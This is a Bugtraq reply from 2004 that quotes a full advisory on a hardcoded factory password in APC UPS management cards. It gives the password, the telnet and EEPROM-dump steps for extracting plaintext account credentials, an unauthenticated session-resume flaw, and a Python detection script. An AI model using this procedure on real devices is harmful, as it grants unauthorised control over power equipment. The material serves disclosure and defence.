
List:       bugtraq
Subject:    Re: APC 9606 SmartSlot Web/SNMP management card "backdoor"
From:       brandon pierce <brandonp () insynclh ! com>
Date:       2004-02-18 16:58:43
Message-ID: 20040218165843.31118.qmail () www ! securityfocus ! com

In-Reply-To: <1076930672.19026.88.camel@localhost.localdomain>

Just tested on a client's Symmetra RM 12000 and had some interesting results with the following setup:

Model Number:           AP9617
Manufacture Date:       12/20/2002
Hardware Revision:      A10

Symmetra APP Ver:       120
Symmetra APP Date:      12/09/2002

AOS Card Ver:   120
AOS Card Date:  12/10/2002

There are a few side notes that should be noted:

The backdoor login does NOT show up in the event log for the system.

If the telnet session using the backdoor login is terminated with ^] then the session can be resumed simply by using telnet to sign back in with NO authentication. This even works if attempting to resume the session from a different IP address.

> *** Background:
> APC (American Power Conversion) SmartSwitch and UPS (uninterruptible power
> supply) products have a Web and SNMP management card installed that permits
> local serial console, TELNET, web and SNMP management, monitoring and
> mains power control of attached devices.
> 
> 
> *** The Problem:
> APC SmartSlot Web/SNMP management cards have a "backdoor" password that can
> be abused to extract plain text username/password details for all accounts
> and hence gain unauthorised full control of the device.
> 
> Tested vulnerable:
> SmartUPS 3000RM with AP9606 AOS v3.2.1 and SmartUPS App v3.2.6
> MasterSwitch AP9212 with AP9606 AOS v3.0.3 and MasterSwitch App v2.2.0
> 
> 
> *** Description:
> The "backdoor" password is designed for use by the factory for initial
> configuration of the card, e.g. MAC Address, Serial Number etc. However, it
> is possible to dump the contents of EEPROM which amongst other things
> stores the account usernames and passwords.
> 
> The "backdoor" password is accepted via either the local serial port or
> TELNET. Use of the password on the web interface does not appear to be
> possible.
> 
> 
> *** To recreate (typical example):
> Connect a console to the serial port or TELNET to the card. At the username
> prompt use any username. The password is all alphabetic characters and is
> case sensitive: TENmanUFactOryPOWER
> 
> At the selection prompt, type 13 and press return. Type the byte address of
> the EEPROM location to view, e.g. 1d0 and press return. Look carefully for
> the username and password pairs. Different firmware revisions may have the
> account details at different EEPROM locations. The accounts in the example
> below are the default accounts after their passwords have been changed.
> Username: apc		Password: BBCCDDEEF
> Username: device	Password: AAAABBBBB
> 
> Press return to get back to the Factory Menu and press ctrl-A to logout.
> You can now TELNET to the card again and use the account details you've
> just recovered to log into and control the device.
> 
> You should use the other selections with extreme care. You may cause
> irreparable damage and will most certainly invalidate any warranty.
> The EEPROM also contains other user-configurable options in either plain
> text or binary encoded form. They are not detailed in this advisory.
> 
> Example:
> 
> [root@always root]# telnet 192.168.1.1
> Trying 192.168.1.1...
> Connected to 192.168.1.1.
> Escape character is '^]'.
> 
> User Name : phade
> Password  : TENmanUFactOryPOWER
> 
> Factory Menu
> <CTRL-A> to exit
> 
> 1AP9606
> 2WA0044004472
> 3G9
> 410/25/2000
> 500 C0 B7 A2 C8 2D
> 6v3.2.1
> 7A
> 8A
> 9192.168.1.1
> A255.255.255.0
> B192.168.1.254
> C
> D
> E
> F
> G
> 
> Selection> 13
> 
> Enter byte address in Hex(XXXX): 1d0
> 
> 01D0   FF 50 46 61 70 63 00 FF  .PFapc..
> 01D8   FF FF FF FF FF FF 42 42  ......BB
> 01E0   43 43 44 44 45 45 46 00  CCDDEEF.
> 01E8   FF 64 65 76 69 63 65 00  .device.
> 01F0   FF FF FF FF 41 41 41 41  ....AAAA
> 01F8   42 42 42 42 42 00 FF 61  BBBBB..a
> 0200   64 6D 69 6E 20 75 73 65  dmin use
> 0208   72 20 70 68 72 61 73 65  r phrase
> 0210   00 FF FF FF FF FF FF FF  ........
> 0218   FF FF FF FF FF FF FF FF  ........
> 0220   64 65 76 69 63 65 20 75  device u
> 0228   73 65 72 20 70 68 72 61  ser phra
> 0230   73 65 00 FF FF FF FF FF  se......
> 0238   FF FF FF FF FF FF FF FF  ........
> 0240   FF 00 00 FF FF FF FF 21  .......!
> 0248   56 00 00 00 00 00 00 55  V......U
> 
> <sp>nxt,b-bck,p-pch,other-exit
> 
> 
> *** Workaround/fix: 
> Ensure that access to the local serial port is physically restricted and
> disable the TELNET interface as described in the device documentation. A
> patched version of the firmware which requires the management password
> to be entered before accessing the factory settings may be available
> from APC.
> 
> 
> *** Vendor status:
> APC were first notified six months ago on 12th August 2003 and were
> initially helpful in patching the problem. However, after testing a couple
> of beta fixes I've heard nothing for over 3 months.
> 
> Dave Tarbatt,
> http://null.sniffing.net/
> 
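The reply above notes that the factory login leaves no trace in the card's own event log, so the only record of its use is what can be seen on the wire. The Python below is an added detection example, not code from either poster: it scans a reassembled telnet session transcript for the indicators named in the advisory (the factory password on the password line, the Factory Menu banner, the EEPROM dump prompt and the dump rows). The two sample transcripts and the management-console placeholder line are constructed, not real captures.

```python
import re

# Indicators taken from the advisory above.
FACTORY_PASSWORD = "TENmanUFactOryPOWER"
FACTORY_BANNER = "Factory Menu"
EEPROM_PROMPT = "Enter byte address in Hex(XXXX):"
# One row of the EEPROM dump: 4-digit address, eight hex bytes, ASCII column.
DUMP_ROW = re.compile(r"^\s*[0-9A-Fa-f]{4}\s+(?:[0-9A-Fa-f]{2}\s+){8}\S")


def inspect_session(transcript):
    """Return the indicator names seen in one session transcript (merged
    client/server text, e.g. reassembled from a packet capture). An empty
    list means nothing suspicious was seen."""
    hits, rows = [], 0
    for line in transcript.splitlines():
        if line.startswith("Password") and FACTORY_PASSWORD in line:
            hit = "factory password used"
        elif FACTORY_BANNER in line:
            hit = "factory menu banner"
        elif EEPROM_PROMPT in line:
            hit = "eeprom dump requested"
        elif DUMP_ROW.match(line):
            rows += 1          # count rows: a run of them is a dump in progress
            continue
        else:
            continue
        if hit not in hits:
            hits.append(hit)
    if rows:
        hits.append(f"eeprom dump rows: {rows}")
    return hits

# Constructed sample transcripts (not real captures).
NORMAL_SESSION = """\
User Name : apc
Password  :
Main Menu (constructed placeholder for the normal management console)
"""
FACTORY_SESSION = """\
User Name : anything
Password  : TENmanUFactOryPOWER
Factory Menu
<CTRL-A> to exit
Selection> 13
Enter byte address in Hex(XXXX): 0210
0210   FF FF FF FF FF FF FF FF  ........
0218   FF FF FF FF FF FF FF FF  ........
0220   FF FF FF FF FF FF FF FF  ........
"""
```

Run against the two samples, the normal login yields no hits while the factory session yields all four indicators; on a real network the same checks can be expressed as IDS content rules on TCP/23 traffic to the management cards.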


